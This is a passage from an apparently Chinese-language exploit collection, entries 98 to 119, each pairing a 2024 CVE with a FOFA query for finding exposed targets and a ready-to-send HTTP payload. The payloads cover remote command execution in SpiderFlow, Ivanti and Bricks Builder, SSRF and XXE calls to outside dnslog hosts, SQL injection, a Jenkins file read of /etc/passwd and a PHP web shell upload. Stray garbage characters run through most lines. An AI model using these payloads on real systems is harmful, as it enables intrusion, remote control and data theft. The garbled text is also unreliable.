User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! \% _4 P# O1 |- C& X/ [- X9 CAccept-Encoding: gzip
# S5 q$ `/ s- q" B4 R4 sConnection: close. ]" h# V5 |- x" K- `. X
Cookie: rememberMe=PAYLOAD0 X  G3 [: Z0 k2 ?
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"# v( d3 b/ `% _9 w
7 N/ H* f3 ~( ^7 B5 R) a4 R
, n* F" n& V, w! p6 n  v4 |
98. SpiderFlow爬虫平台远程命令执行" i  E2 ?! _& D, N
CVE-2024-0195( a( ?1 C4 A3 Z; e4 }
FOFA:app="SpiderFlow"4 \  Q, N* n$ D" u, Y. E, w/ `9 J
POST /function/save HTTP/1.1& J* w3 ?, D$ o% n- @
Host: 192.168.40.130:80887 ]" [! }+ x" N; P# a8 d3 \# L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; A/ U3 i7 L/ ZConnection: close
1 m" ^9 Z0 `$ @: K. F  g6 V. b% rContent-Length: 1214 c: w: c" E4 P# O. K; Y' A
Accept: */*
5 D6 \4 Q& h- d0 ^$ ^( NAccept-Encoding: gzip, deflate
$ w1 _8 ]: P1 f: f" t$ M, ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. K4 Z: k+ f( b2 }* v1 x; Y$ bContent-Type: application/x-www-form-urlencoded; charset=UTF-84 K( E+ R, l) n' F0 o) ]$ w
X-Requested-With: XMLHttpRequest/ O& D4 b5 `) F
, I; |  Y+ ?5 o: H* g( R0 p6 ]
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
6 A" A9 ]9 @' q- a  m  u! a: H$ m" R* |+ t

4 ?- d3 @  f% ^. V* Z1 }99. Ncast盈可视高清智能录播系统busiFacade RCE! q$ D0 r  X5 K! Z) H# K! C$ n
CVE-2024-0305" p5 Y3 B: D9 B
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
' K, P* |9 B( P' K& lPOST /classes/common/busiFacade.php HTTP/1.1
& g: _) s$ M* D0 B1 LHost: 192.168.40.130:8080
- H% p$ H& i2 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( n& |8 }5 x! iConnection: close6 M5 w  n3 D/ f: a( R
Content-Length: 154; r  H2 z6 U! R$ ^( [
Accept: */*
$ O6 s9 j0 @. Q+ F0 J- B( A# _Accept-Encoding: gzip, deflate4 U7 k  e3 B& w: r. d1 T7 x" o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' n/ O  W: ?' h1 n7 P
Content-Type: application/x-www-form-urlencoded; charset=UTF-8" s7 E0 A* n& R* F% z
X-Requested-With: XMLHttpRequest% p* r% x0 b) h3 f! _. @
+ e& o' ~! t2 q' P) x: _  C% r0 d- l
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D4 a" q7 A& N+ G4 m6 X: P
  |( G# @7 m9 Z. U  i
9 E3 v+ Y0 T' \6 ]' A/ F4 s; T
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传3 z0 m& }0 r! r% `: H% q* w
CVE-2024-0352
7 a3 r9 t$ l* [FOFA:icon_hash="874152924"
4 |9 A) B; c3 {) \) H3 L' WPOST /api/file/formimage HTTP/1.1
  [0 A2 U7 g6 f5 }Host: 192.168.40.130
8 W! |4 f! ?) s( DUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36* i# k8 t6 O( C  o" ~
Connection: close8 f/ o4 w5 |  r' {- [4 ^" ]7 Q
Content-Length: 201; I% Z: Z/ a3 s  y0 h2 E
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
2 o. M* r  l* z( Y8 k7 |Accept-Encoding: gzip9 v# x* X( ~# B- K8 u; P3 A" q4 Q

. t9 }; x9 B8 j: D------WebKitFormBoundarygcflwtei
7 f( L$ w7 G- {; E; E. iContent-Disposition: form-data; name="file";filename="IE4MGP.php"5 O6 P, Y5 W6 l7 F
Content-Type: application/x-php+ W, a+ o% C$ E( w. @  Y
+ T2 l9 @( Q& R4 f; [4 ~/ B
2ayyhRXiAsKXL8olvF5s4qqyI2O
; J* {" `% n# [$ v* ]' [( n# P! g------WebKitFormBoundarygcflwtei--
+ }1 a6 ?, D7 g4 D- A) @
% b4 f* _. u! q" @& X0 K' R% e% \8 h
101. ivanti policy secure-22.6命令注入
" N$ u+ s' c2 c7 Y) dCVE-2024-21887
. |6 j" c' I) n8 ~. aFOFA:body="welcome.cgi?p=logo"
& o: n  z9 D) f- F$ t! NGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1$ u+ O9 ?& V( x: O! V: D
Host: x.x.x.xx.x.x.x
2 e, u( _5 `- h7 C: P) s) UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( k, t" D" k5 ^- h" C3 kConnection: close
- N# ^" [; g! w2 ]Accept-Encoding: gzip
$ y- O/ S4 q# L/ I- m0 @0 V
0 [' {5 `( P! _% ]: _- u/ e3 K8 b
$ a# m( g9 z& v9 u3 @3 l102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
" i6 K0 s8 M7 P+ wCVE-2024-21893
" r6 M4 K3 h3 b" a( O6 IFOFA:body="welcome.cgi?p=logo"
  J' {- m5 F! `' APOST /dana-ws/saml20.ws HTTP/1.1
! e! g; L# j, hHost: x.x.x.x$ P4 w4 L1 t; y  M5 I& s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# i& o  V: k  ]4 Z
Connection: close1 t# t) r) i( n
Content-Length: 792
" ]8 o8 b& y. z, E1 W: a' N- JAccept-Encoding: gzip% j5 ^+ f$ F6 U* e: o9 g, ^4 R2 D

- V+ }) z- h$ k3 L0 x<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>0 C9 l& N( X- q* P

1 k: }) G6 e% ?, f3 x$ a103. Ivanti Pulse Connect Secure VPN XXE2 `$ Q7 t$ X+ w6 K4 L5 P  W
CVE-2024-220244 Y& p% B( e  O, n- {
FOFA:body="welcome.cgi?p=logo"" Y% I! l' z5 a9 n! M6 I7 R1 v5 p
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
3 f+ n$ P2 ^& R  ~+ a# iHost: 192.168.40.130:111' M' L. ~. a% N5 J
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
  Q7 f. ^( o# ^; g7 M3 lConnection: close
7 b; S2 U; z7 x' D1 W3 k2 P- E  ]Content-Length: 204
0 u/ G8 \+ `8 ^0 z  Q* }' eContent-Type: application/x-www-form-urlencoded( \" H/ ]5 z( K3 m9 ^
Accept-Encoding: gzip& T/ z/ s3 ]' |: X6 P: ~- H; b

, d% `6 ?5 s5 YSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
7 ?: j- I; v; |# L! i# v, Y! |0 r% W8 Y1 V- b/ v0 X! p- S

) i- B  L4 D" H5 b其中SAMLRequest的值是xml文件内容的base64值,xml文件如下# u/ y9 ?/ |/ M+ p. p. g' ^0 n
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
( U+ `; c, g0 B5 Z- P! @/ A( s* v3 Y  R0 G# j& q* `7 M" N* V! r* z$ U5 U
. X' b+ f2 Y; O  N, R
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
9 r0 r9 q5 S4 `5 s+ {CVE-2024-0569
4 `2 [( d; d7 f! r6 @- E+ G; sFOFA:title="TOTOLINK"
. P5 I, E: M5 a$ K5 j: U% JPOST /cgi-bin/cstecgi.cgi HTTP/1.1
' }  g, M+ Q* H9 ^) D- p& dHost:192.168.0.1' e! P1 U/ _8 T1 y5 q9 V
Content-Length:41" q" p; p$ R' e: ~6 J! U6 u; s& t: L* r
Accept:application/json,text/javascript,*/*;q=0.011 ^( ]& C2 `% |
X-Requested-with: XMLHttpRequest
* Q3 Q+ _; u, K) @! u5 x/ y) rUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
* L) h2 W$ v: h9 bContent-Type: application/x-www-form-urlencoded:charset=UTF-8
* y) q. W# m& Q0 j% g: P9 C/ aOrigin: http://192.168.0.12 b# c0 Q& K; }
Referer: http://192.168.0.1/advance/index.html?time=1671152380564* e0 i' X* O9 b7 `! d( F) M
Accept-Encoding:gzip,deflate
8 l' E2 C8 ]3 jAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7  Z7 u7 l; h6 n$ G
Connection:close1 M" H4 c$ `1 s8 D7 ]) X+ t

# e! W. s  }" o! z9 [{4 J8 M8 N* W9 h/ L
"topicurl":"getSysStatusCfg",& U) Q+ W8 R: `- g* [
"token":""
7 D+ z4 {2 w4 x: D5 M}1 I0 x  e; ~' c" y
% {; T% {1 [% b- A, r
105. SpringBlade v3.2.0 export-user SQL 注入
, N' ^! E1 ^( |  {: nFOFA:body="https://bladex.vip"
% K" L. e7 \: mhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1% a9 n8 ]6 K7 f7 A7 n( y/ J
! F; o; k1 z4 z8 w9 y3 K+ J
106. SpringBlade dict-biz/list SQL 注入' V0 P. z6 J( Z5 z5 s& s' e
FOFA:body="Saber 将不能正常工作"" v* B& x, r! d: e# n$ O  b0 U! v
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
# u5 S. u* t3 }1 ?. b0 `8 w' qHost: your-ip
  ^8 ]$ a) H( I/ W& G0 n: A- A$ y) ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 X, X$ v6 j# ZBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A. e6 A9 b9 T; Q% r8 x
Accept-Encoding: gzip, deflate6 r" n& n" a+ R* J- J" g
Accept-Language: zh-CN,zh;q=0.9% K: ^$ ^: @; U1 n/ s: R, Y2 Y2 D
Connection: close
% j) V& D* @' O! i; S7 H: y: {9 b( n+ X/ S* F

5 R! ^6 p  J( k- S1 v& {- I( u2 F- X107. SpringBlade tenant/list SQL 注入: }4 ^' d3 r2 d5 Y+ [) r
FOFA:body="https://bladex.vip"
4 }* |. D+ l6 H) X2 c% m+ yGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
; u; C1 j% n2 W% yHost: your-ip2 ^: I" J/ Z2 N3 t1 t1 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36  ]6 |, }% h& ?6 v& b; ^
Blade-Auth:替换为自己的
' t3 f# g$ `' {$ x  h  _Connection: close; K; F- @. r" l
& |* T( m% {! Q) a
" j7 ?3 {" l7 |% Q+ x2 X$ P
108. D-Tale 3.9.0 SSRF
9 o/ S; R% O6 e! s7 uCVE-2024-216428 I! j( Y0 j7 L4 H& d$ e0 ^
FOFA:"dtale/static/images/favicon.png"$ l" O, N( U) |9 \, Z0 A) K: |
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.12 }% w) e6 a$ s  C5 f0 ^# T+ N: y
Host: your-ip* p' m" s$ e6 r& @: N
Accept: application/json, text/plain, */*
. D# M4 l! ]9 s2 c% EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& h+ n+ @) ?4 P) B
Accept-Encoding: gzip, deflate+ ~  j3 |6 V% f; B* t; H
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ O2 l0 v3 Q! h& ?  v% [% ^Connection: close
* ?9 M% i. E; D% p
+ T3 O2 g8 _& E: ^
3 u- B2 p/ `& D$ o4 j: k  h109. Jenkins CLI 任意文件读取. S( J6 I% N  P9 h& a2 S- b
CVE-2024-23897
- t* [% u4 j/ N5 [& PFOFA:header="X-Jenkins"0 O# O& }* u- I0 Z& w' X8 z6 V
POST /cli?remoting=false HTTP/1.1
* n$ b: n$ x! f) yHost:
0 Y" ?9 T; _6 m7 j( S5 j2 G( O" fContent-type: application/octet-stream  T; |% N$ M3 {) e* h# w
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92$ \2 O! q3 D6 D$ w# t) f) ?
Side: upload0 S! N- }1 \+ B7 Z
Connection: keep-alive
, |. }8 U1 h# v- o5 q) {Content-Length: 163! J+ ?3 N: g4 Z4 [9 T

; v8 x6 E; p! O9 p) J6 ^b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
9 t9 @. u+ k; s5 C8 b7 e7 K
" M2 i) M; {& o- e/ `# h+ P, }3 m3 H$ {. K
POST /cli?remoting=false HTTP/1.1
  v# x2 S  M( n% ~6 z5 @' _: WHost:
# Y& A  b8 O1 cSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
# F! K/ I3 Q% F" K7 c1 Sdownload1 Z1 j: g" E6 H0 _; p
Content-Type: application/x-www-form-urlencoded
4 Q, x. a$ o$ d" T& u  q8 ^: H2 EContent-Length: 0$ p: t6 N0 P. f# n- \5 E

, X2 `+ G3 M- Z8 Y
5 \2 ]; r! N1 j/ R9 ?ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
6 e9 a: k& s* e, d6 hjava -jar jenkins-cli.jar help
- g# |7 y. _! `$ R[COMMAND]
2 a3 s7 Y: K+ iLists all the available commands or a detailed description of single command.
2 k2 q4 E+ \/ r8 l0 x5 K5 b, g COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
* U5 a4 v; u6 f: g! a6 l5 R' v6 E/ w0 m: Z% f) \" n. C, }
( S8 v9 F9 r2 I
110. Goanywhere MFT 未授权创建管理员7 _3 V" T7 t" {, M" V7 p# p
CVE-2024-0204
' f- Q$ M. @- ?FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"- M+ d7 }- z# m' c+ y
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.13 a) p% }7 E; _! I' L
Host: 192.168.40.130:8000
( M9 s8 a! E5 A$ y% c8 t. EUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36  w" k$ q$ [+ a7 O" P) V
Connection: close
/ x, j; |4 C6 rAccept: */*- ]4 \7 g! l) O5 n$ G9 \
Accept-Language: en( U$ k* E. E/ R
Accept-Encoding: gzip8 ]: ?% y/ {1 Y% s0 q" z- t

* f  A; H8 q0 k& B0 d. ^/ O& N
) o& N6 C; n4 w/ b  L111. WordPress Plugin HTML5 Video Player SQL注入
5 Y3 G( _/ g8 F) U" ACVE-2024-1061
, i" z; ^) l) z1 c; Z9 xFOFA:"wordpress" && body="html5-video-player"
9 E0 F& P% v' t5 dGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
! {. C7 {1 c2 u& EHost: 192.168.40.130:112$ C' y, |9 A; r% j# o/ s" q4 e5 N
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.362 R+ h1 n) n9 a
Connection: close
8 ?$ q! ]3 |9 P1 [9 M$ K( xAccept: */*
6 u* S' o0 ?% E" J* M% _5 K% jAccept-Language: en
3 }% z5 l* U* R; `. T2 n8 qAccept-Encoding: gzip
& h0 C" A# y1 I! Q0 b6 v4 D8 x: t
% u: a# |( I- a6 q) s) m1 F2 }, Y% Z1 q+ h: Q
112. WordPress Plugin NotificationX SQL 注入5 D% T( Y% T8 m
CVE-2024-1698
; I# [2 K, t, vFOFA:body="/wp-content/plugins/notificationx") O! Z- a) q( {) ~
POST /wp-json/notificationx/v1/analytics HTTP/1.1
2 M& O5 N! T: I# t8 aHost: {{Hostname}}2 M' E. y! v) j4 z& x1 y+ m
Content-Type: application/json. K' s! _" i, X# G* q

% S+ T) k  ~  j. ~! l  M{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}; J- C9 Z, x* ?# Z' Y
3 l: M" S8 G, L( e& ]/ k1 ^
4 j3 i3 l, z9 S; M/ G* i, u! ^
113. WordPress Automatic 插件任意文件下载和SSRF  T0 Y; M8 w* O
CVE-2024-279549 G# }+ y% D4 d- ~
FOFA:"/wp-content/plugins/wp-automatic"2 F, I' X. S; A) J- T: u
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1/ g: i. t# K4 R* k' k+ L3 l1 `$ b
Host: x.x.x.x
7 q* Z2 V, @  X: vUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
/ R! H# M$ d2 M# c; P. X3 IConnection: close% a$ Q9 z( }8 d* p
Accept: */*/ x' }# [( r% o
Accept-Language: en" Q& N5 }' C* p. O0 j' n
Accept-Encoding: gzip2 @- e# ]1 P8 x
" u7 Y7 i+ K, F$ Z
" ?, Z: _' c) ^& Q. W/ p0 b
114. WordPress MasterStudy LMS插件 SQL注入+ p4 N% r1 u: H% S% T
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"* R3 [6 m6 v6 `  [0 H
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
! S$ `3 L4 u- W* U: OHost: your-ip
9 v0 a# t: T: n& ~User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ B! M! n# u, }
Accept-Charset: utf-8" V/ l9 F0 Y7 ]+ p$ c
Accept-Encoding: gzip, deflate; ?- K/ g! i5 i' }
Connection: close* C7 v4 r* k; n
& W# @" D: L  Q

( Q' V$ N7 {3 S, M1 }! J2 H) S7 [115. WordPress Bricks Builder <= 1.9.6 RCE
) @4 c" t7 J* r1 h8 N5 ICVE-2024-25600
3 Y9 {/ m: Y: t, xFOFA: body="/wp-content/themes/bricks/"0 W8 i2 Z* F/ n2 L5 @
第一步,获取网站的nonce值1 d6 s# y+ `$ s6 P* k7 M# o1 H
GET / HTTP/1.1
& N, n( t5 m9 \  xHost: x.x.x.x7 h3 B: [5 T" P+ f9 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
0 |" `, o+ H0 \, l+ q4 IConnection: close: Y9 e* l9 l  _3 ^' x
Accept-Encoding: gzip6 U0 ?# A5 V& P8 B

  a! U( u' M) H
5 ~- v1 f; T5 W! z第二步替换nonce值,执行命令% X1 m" m$ k8 t3 [4 O1 e! \. g
POST /wp-json/bricks/v1/render_element HTTP/1.1
4 I/ U0 {2 t4 V; f3 G# CHost: x.x.x.x
; W) f/ c6 L7 V9 T( B) RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
8 l0 S1 m+ z! f4 y8 X9 \Connection: close3 H1 J5 L/ ~# _7 z, z
Content-Length: 356
! t0 ]% W2 B: q  p; x( L0 U% ?0 hContent-Type: application/json
1 N% D$ c& Z: g5 |3 l% U( }$ KAccept-Encoding: gzip* ]; U  H& B. _1 e
9 s) P' v4 i( q6 y3 C& S
{  k3 ?" B) _6 j" N# t; I
"postId": "1",
: W4 t8 X% d: g% @: x  "nonce": "第一步获得的值",
* G& c, L7 h' Y  M  "element": {
1 @, X$ z& o2 i; K* ~* z8 h" e6 x, n4 k    "name": "container",
$ F0 F7 c) F5 I' A    "settings": {9 y5 V, ^8 N# ?* Z( ]' J2 N
      "hasLoop": "true",5 C+ ~# w+ o7 x" _  d3 @
      "query": {' e9 N9 o0 m& n- |" T
        "useQueryEditor": true,* A5 c! @- u! z4 _
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",  w% {2 \/ b- p5 b( V1 w9 P
        "objectType": "post"
  e3 W; q3 ^6 g9 C) i7 A6 B      }4 S% g. f1 U1 j) ~5 ~  o$ L+ N( H
    }
8 X0 w, z, J( S! g: B  }( _7 }7 a4 O2 H% {+ J. v
}
! E' F. ~5 b6 u0 F0 Z6 y2 o# D, u/ _5 e, |# z$ K8 m+ T# q

) P" M) `, L0 R' r4 T0 G; u4 E116. wordpress js-support-ticket文件上传
0 r2 e  [1 r: ]: C4 AFOFA:body="wp-content/plugins/js-support-ticket"
& ]; s) Z) O& f3 Z! Z7 T" \POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
5 B: u: N$ Z  s& I5 W0 r% cHost:
3 A- f3 t: u5 A) }+ iContent-Type: multipart/form-data; boundary=--------767099171
* ]7 h7 `$ {1 yUser-Agent: Mozilla/5.0
7 I3 a: S0 v8 K! c+ ^, h  A; z0 H5 }) t/ o% ^7 k, O
----------767099171
3 E: T: n9 K/ M# c1 p0 lContent-Disposition: form-data; name="action"
+ y- p9 ]4 Y) I; O+ R; dconfiguration_saveconfiguration
) H3 i5 d3 K5 Y) n2 o, K4 h----------767099171) T+ l2 J0 z- D* v
Content-Disposition: form-data; name="form_request"% z3 _% o9 q0 R+ D" Z5 ]  u% t/ e
jssupportticket& v' j( X, `* h2 ?. @1 a
----------767099171
2 @& P  h- V. ]5 V; g1 BContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"6 n+ a- h0 v+ m+ W  ^
Content-Type: image/png
+ `8 [  a2 r. C1 z5 h  E0 b2 H7 f----------767099171--
7 B1 i  N, S* c; F: n9 e: B) M# [9 {- S
. ~* q9 Q, h* M( I
117. WordPress LayerSlider插件SQL注入
* U# Q, C. J1 a( sversion:7.9.11 – 7.10.0( V; i+ {4 w. `) i0 Q- C1 W
FOFA:body="/wp-content/plugins/LayerSlider/"2 N+ A" E: [5 j* \; b' j
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1- k/ @$ u% H) \! |
Host: your-ip
# S0 D+ `& o4 T8 w0 f- ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ J& p- P" X6 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ k9 y# F- m) j' GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; I0 F  t9 u7 i& JAccept-Encoding: gzip, deflate, br
; K* l3 ]7 ]2 z$ s! P* _Connection: close
% ]9 w1 k( }+ K! R8 X; FUpgrade-Insecure-Requests: 1
  w& k2 T8 q6 ]4 L. v( L, p
2 [9 q  _: {4 ^8 g: p' O' ^! v# y8 k
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传6 C( L) x( N+ [- }0 w+ A" }
CVE-2024-0939" {" \. Y5 }9 p
FOFA:title="Smart管理平台"
" `, c9 ]5 a' l5 nPOST /Tool/uploadfile.php? HTTP/1.1
9 \4 M' K5 S+ B- K, gHost: 192.168.40.130:84432 e/ v0 ]0 T! Z
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
8 z3 K+ _) N6 J3 B* R$ vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0- K* ]! [7 z4 s" z" ~+ s! @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 T: b; M! E. z4 _3 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ w7 J5 L/ }/ G$ T5 T& D: `- v$ P
Accept-Encoding: gzip, deflate
, X* D$ \/ j3 Z  JContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887* w1 F$ w0 G: V  m  v3 j$ f
Content-Length: 405! c7 }8 R8 T, B* v8 ^+ u( X0 [
Origin: https://192.168.40.130:84437 V8 v9 v; h; z1 M) p0 O/ c
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
+ l# S3 F" F: H# _- sUpgrade-Insecure-Requests: 16 _/ o  X/ l6 C) O& K+ `1 `" F. L
Sec-Fetch-Dest: document2 X% e7 F! t& W. \
Sec-Fetch-Mode: navigate
( w' d1 N6 b; c; O+ a; ~% WSec-Fetch-Site: same-origin+ A. @& c" g$ }- E2 S% y
Sec-Fetch-User: ?1
! b+ v: `+ G# ^) D) v. v8 X# bTe: trailers
# Y0 w; Y) w7 p' k) H& f) Z- J5 lConnection: close! P3 M- }9 I/ x+ P; V
1 @$ ]8 d6 x4 K7 u& \+ a3 F
-----------------------------13979701222747646634037182887: L5 X& W; j$ g9 z4 B
Content-Disposition: form-data; name="file_upload"; filename="contents.php". d5 ^% t0 g! q6 z: V+ u
Content-Type: application/octet-stream* q! X  H" {: \- W. `

7 b5 S  Y( B# M; j- q6 ]<?php) d( Y, v5 g$ r. N! ]8 t/ j
system($_POST["passwd"]);, g! M. _& l; A, S- }8 q1 E
?>
" [; F1 l' |9 P5 b0 m1 U. c-----------------------------13979701222747646634037182887
7 U  d6 x& D6 ?2 d" j1 A# }+ c9 uContent-Disposition: form-data; name="txt_path"' F1 y  Y: W7 K
5 F9 v: _$ J. G, r* F  {* m
/home/src.php
# R" z: @7 w8 R, p0 m-----------------------------13979701222747646634037182887--: W9 H+ w) K- c* `# D: [
8 R# H- ~2 ^. o/ B& ^0 y2 b: @
. D6 ^7 Y8 G' N) p$ c
访问/home/src.php! \. N  o, z% b& o; h
7 H# ?' L3 ~  P9 d8 L7 Y/ s
119. 北京百绰智能S20后台sysmanageajax.php sql注入
  r- j* E- z4 j) o! XCVE-2024-1254
/ \. t- Z3 D* TFOFA:title="Smart管理平台", c% D$ D" T! U5 Z! h
先登录进入系统,默认账号密码为admin/admin
